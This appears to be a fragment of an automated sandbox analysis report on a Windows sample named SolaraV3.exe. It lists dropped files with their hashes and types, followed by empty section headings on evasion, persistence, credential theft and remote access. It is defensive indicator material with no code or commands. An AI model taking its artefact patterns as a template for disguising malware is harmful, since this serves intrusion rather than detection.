C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvkwfz0s.3d3.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2h1d4le.1dp.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1wg00js.dft.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uidiymg4.rdm.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2qt1z15.jx2.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfbhdf3t.3du.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wt2lezrh.c0x.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt4mjqas.uhw.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2jmv5sg.bun.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP	MSVC .res	B924452EC3C619C408C3D05D28887E96	8C739D3B9CEF4D24724713F57357A46229B06BFF	103D379A7AEF9D51E88CEAFE19BE2942845C9DA12139A672C451BB244AB752B0
C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.0.cs	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	C76055A0388B713A1EABE16130684DC3	EE11E84CF41D8A43340F7102E17660072906C402	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline	Unicode text, UTF-8 (with BOM) text, with very long lines (612), with no line terminators	33C78BF0C2E6639DA4473B5B54B5CE46	007D0C3116B3C88CF479366E66091EABBD6F795D	C10CFE18818A4171C2FB662F945141597346B4569D1C9C08E0C8119BD102FECE
C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	1A00D1CEE4B1ED5ECD37DF632F118825	F2C6B3982503D7355A8D2E1908E9A1354F29BDED	FB7884BAF27AB889E693327511078148F078378ED5EC941F505132715550D1E7
C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.out	Unicode text, UTF-8 (with BOM) text, with very long lines (720), with CRLF, CR line terminators	45A323E38C7FFFCDD407D1AF86B86D4E	16C0C41D68403E19EE58A2CEABEEC8778BE728F6	1EC49CF0E94AF313A7C5E5059FB7EDEA4D78AA9CD136CA72CA8C8255492E8075
C:\Users\user\AppData\Local\Temp\w0e8R.zip	RAR archive data, v5	05417017ACEFF1DA4CC51458C0D86B73	3B53B616ECA869EBAB4B5ABA0550E79CC3BC0FB1	76B2A12036FAAD3733421679A973540730D5C47406F8A8C9FABC008F13B7D7A9
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	JSON data	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
\Device\ConDrv	ASCII text, with CRLF line terminators	195D02DA13D597A52F848A9B28D871F6	D048766A802C61655B9689E953103236EACCB1C7	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A

Windows Analysis Report SolaraV3.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
SolaraV3.exe